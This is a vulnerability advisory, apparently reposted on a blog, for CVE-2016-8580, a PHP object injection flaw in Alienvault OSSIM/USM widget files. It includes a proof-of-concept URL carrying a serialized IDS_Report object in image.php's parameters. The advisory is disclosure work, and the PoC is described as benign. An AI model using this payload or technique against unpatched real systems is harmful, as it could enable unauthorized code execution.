Details=======Product: Alienvault OSSIM/USMVulnerability: PHP Object InjectionAuthor: Peter Lapp, lappsec () gmail comCVE: CVE-2016-8580Vulnerable Versions: <=5.3.1Fixed Version: 5.3.2Vulnerability Details=====================A PHP object injection vulnerability exists in multiple widget filesdue to the unsafe use of the unserialize() function. The affectedfiles include flow_chart.php, gauge.php, honeypot.php,image.php,inventory.php, otx.php, rss.php, security.php, siem.php,taxonomy.php, tickets.php, and url.php.An authenticated attacker could send a serialized PHP object to one ofthe vulnerable pages and potentially gain code execution via magicmethods in included classes.POC====This benign POC injects the IDS_Report class from PHPIDS into therefresh parameter of image.php. The __toString method of IDS_Report isthen executed and the output is displayed in the value of the contentfield in the response:/ossim/dashboard/sections/widgets/data/image.php?type=test&wtype=blah&height=1&range=1&class=1&id=&adj=1&value=a%3A5%3A{s%3A3%3A%22top%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22adjustment%22%3Bs%3A8%3A%22original%22%3Bs%3A6%3A%22height%22%3Bs%3A3%3A%22123%22%3Bs%3A7%3A%22refresh%22%3BO%3A10%3A%22IDS_Report%22%3A3%3A{s%3A9%3A%22*events%22%3Bs%3A9%3A%22testevent%22%3Bs%3A7%3A%22*tags%22%3Bs%3A1%3A%221%22%3Bs%3A9%3A%22*impact%22%3Bs%3A16%3A%22Object+Injection%22%3B}s%3A7%3A%22content%22%3Bs%3A36%3A%22aHR0cDovL3d3dy50ZXN0LmNvbS8xLnBuZw%3D%3D%22%3B}Timeline========08/03/16 - Reported to Vendor10/03/16 - Fixed in version 5.3.2References==========https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal